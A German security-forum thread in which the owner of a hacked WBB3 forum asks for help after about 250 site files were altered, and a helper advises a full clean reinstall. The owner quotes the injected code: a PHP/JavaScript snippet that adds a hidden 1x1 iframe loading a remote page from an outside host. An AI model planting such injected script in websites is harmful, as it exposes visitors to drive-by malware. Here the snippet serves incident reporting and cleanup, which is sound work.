Zurück   Trojaner-Board > Malware entfernen > Diskussionsforum

Diskussionsforum: Forum durch Malware down

Windows 7 Hier sind ausschließlich fachspezifische Diskussionen erwünscht. Bitte keine Log-Files, Hilferufe oder ähnliches posten. Themen zum "Trojaner entfernen" oder "Malware Probleme" dürfen hier nur diskutiert werden. Bereinigungen von nicht ausgebildeten Usern sind hier untersagt. Wenn du dir einen Virus doer Trojaner eingefangen hast, eröffne ein Thema in den Bereinigungsforen oben.

Antwort
Alt 11.12.2012, 20:59   #1
northshore81
 
Forum durch Malware down - Standard

Forum durch Malware down



Hallo Community.

Ich hoffe das ihr mir weiterhelfen könnt, da es sich evtl. nicht direkt um einen Trojaner handelt.
Aber da ich dieses Forum schon seit langem kenne und oft zur Hilfe genutzt habe, musste ich bei folgenden Problem direkt an trojaner-board denken.

Also :

Ich führe ein WBB3 Forum seit Sommer diesen Jahres. Es wurden auch meinerseits ein paar Addons zur Forensoftware hinzugefügt (alle aber von der WBB Seite oder Partnerseiten).
Seit dem 09.12.12 ist das Forum nicht mehr zu benutzen, lediglich der Banner ist zu sehen.

Nun sehe ich auf meinem FTP Server, das fast sämtliche tpl, js und teilweise php Dateien am 09.12.12 um 16:46-16:53 verändert wurden (knapp 250 Dateien, groß geschätzt).

Alle Dateien weisen den gleichen, zusätzlichen Code auf :

Code:
ATTFilter
<? #f524d6# echo " <script type=\"text/javascript\" language=\"javascript\" > (function () { var qfesb = document.createElement('iframe'); qfesb.src = 'hxxp://metra3.sk/counter.php'; qfesb.style.position = 'absolute'; qfesb.style.border = '0'; qfesb.style.height = '1px'; qfesb.style.width = '1px'; qfesb.style.left = '1px'; qfesb.style.top = '1px'; if (!document.getElementById('qfesb')) { document.write('<div id=\'qfesb\'></div>'); document.getElementById('qfesb').appendChild(qfesb); }})();</script>"; #/f524d6# ?>
         
Laut dieser Seite ist das Forum mit Malware infiziert : hxxp://sitecheck.sucuri.net/results/www.soldiersandlegions.de/

Meine Seite : www.soldiersand//legions.de (ohne //)
ICH BITTE MEIN FORUM NUR MIT VORSICHT AUFZURUFEN, DA ICH NICHT WEISS WAS DIE MALWARE MACHT !!!

Nun erhoffe ich mir hier Hilfe, da sämtliche Beiträge verloren wären ... letztes Backup liegt 2 Monate zurück

Da die Dateien alle durch ein vermutliches Script verändert wurden, kann man dies dann mit einem weiteren Script nicht rückgängig machen ?

Wäre super hier Hilfe zu finden, oder evtl Empfehlungen, wo man mir helfen kann.

Gruß, northshore81

Alt 11.12.2012, 22:29   #2
Shadow
/// Mr. Schatten
 
Forum durch Malware down - Standard

Forum durch Malware down



Wo liegt jetzt dein Problem?
Die Daten (Inhalte = Beiträge) des Forums liegen doch in keinen tpl, js oder php-Dateien, sondern in der MySQL-DB.
__________________

__________________

Alt 11.12.2012, 22:38   #3
northshore81
 
Forum durch Malware down - Standard

Forum durch Malware down



Gibt es eine Möglichkeit, die Dateien mittels eines Scriptes in den ursprünglichen Zustand zu versetzen, oder muss ich die alle komplett neu aufspielen.
Dann müsste ich auch sämtliche Addons mit ACP Einstellungen neu installieren
__________________

Alt 12.12.2012, 07:51   #4
Shadow
/// Mr. Schatten
 
Forum durch Malware down - Standard

Forum durch Malware down



Zitat:
Zitat von northshore81 Beitrag anzeigen
Gibt es eine Möglichkeit, die Dateien mittels eines Scriptes in den ursprünglichen Zustand zu versetzen,
Nein.
Woher soll ein Script wissen, wie die Dateien vorher ausgesehen haben?

Es ist zwar möglich einen bestimmten Ausdruck per Script zu entfernen, aber wer sagt, dass es dann tatsächlich "wie vorher" aussieht?
Eben. Niemand!
Irgendjemand hat oder hatte Zugriff, kann alles geändert haben, kann noch mehr, kann weiteres geändert haben, hinzugefügt haben. So dreckig wird keine Website gesäubert. Da greifen (eventuell) viele Nutzer zu, es ist nicht nur ein persönlicher, lokaler Computer zum Rumdaddeln.

Sichere den Zugang ab, ersetze lückenlos alle Dateien mit den Originaldateien, aktualisiere das System so weit wie möglich, spiele eventuell gewünschte oder nötige "Add-ons" ein.
__________________
alle Tipps + Hilfen aller Helfer sind ohne Gewähr + Haftung
keine Hilfe via PN
hier ist ein Forum, jeder kann profitieren/kontrollieren - niemand ist fehlerfrei
tendenzielle Beachtung der Rechtschreibregeln erhöht die Wahrscheinlichkeit einer Antwort
-


Antwort

Themen zu Forum durch Malware down
banner, beiträge, code, dateien, direkt, down, folge, folgende, forum, ftp, knapp, malware, nicht mehr, problem, runter, rückgängig, script, seite, server, software, super, trojaner, trojaner-board, verloren, verändert, wbb3, zusätzliche



Ähnliche Themen: Forum durch Malware down


  1. ismagent.exe - Anwendungsfehler durch Malware?
    Plagegeister aller Art und deren Bekämpfung - 23.06.2015 (17)
  2. Chinesische Malware kommuniziert über TechNet-Forum
    Nachrichten - 18.05.2015 (0)
  3. Win 7: Prozessor ausgelastet durch malware?
    Log-Analyse und Auswertung - 26.04.2014 (7)
  4. Malware/Spam durch Amazon.de
    Plagegeister aller Art und deren Bekämpfung - 08.03.2014 (11)
  5. Mehrere Trojaner durch Malwarebytes Anti Malware gefunden und ein Virus durch Avira gefunden (TR/Gendal.81920.6)
    Log-Analyse und Auswertung - 10.11.2012 (1)
  6. Avast durch Malware deaktiviert
    Plagegeister aller Art und deren Bekämpfung - 03.11.2012 (4)
  7. Malware durch Festplatte formatieren entfernen?
    Diskussionsforum - 13.10.2012 (9)
  8. malware läuft nicht durch
    Plagegeister aller Art und deren Bekämpfung - 12.09.2012 (5)
  9. Rootkit0Access durch Malware gefunden
    Plagegeister aller Art und deren Bekämpfung - 11.07.2012 (1)
  10. Weiterleitung durch google/Malware
    Log-Analyse und Auswertung - 19.07.2011 (23)
  11. Computer durch Malware lahmgelegt worden
    Alles rund um Windows - 18.04.2011 (13)
  12. Malware Spyware.passwords.xgen durch Malwarebyte Anti-Malware erkannt.
    Plagegeister aller Art und deren Bekämpfung - 19.12.2010 (50)
  13. Malware durch Surfen
    Diskussionsforum - 16.01.2010 (5)
  14. HTML/Infected.WebPage.Gen durch Forum
    Log-Analyse und Auswertung - 26.07.2009 (2)
  15. Malware Fund durch AntiVir
    Log-Analyse und Auswertung - 28.03.2009 (0)
  16. Infiziert mit Malware durch JPEG.exe
    Plagegeister aller Art und deren Bekämpfung - 11.11.2008 (8)
  17. tastaturproblem durch malware?
    Mülltonne - 28.10.2008 (0)

Zum Thema Forum durch Malware down - Hallo Community. Ich hoffe das ihr mir weiterhelfen könnt, da es sich evtl. nicht direkt um einen Trojaner handelt. Aber da ich dieses Forum schon seit langem kenne und oft - Forum durch Malware down...
Archiv
Du betrachtest: Forum durch Malware down auf Trojaner-Board

Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.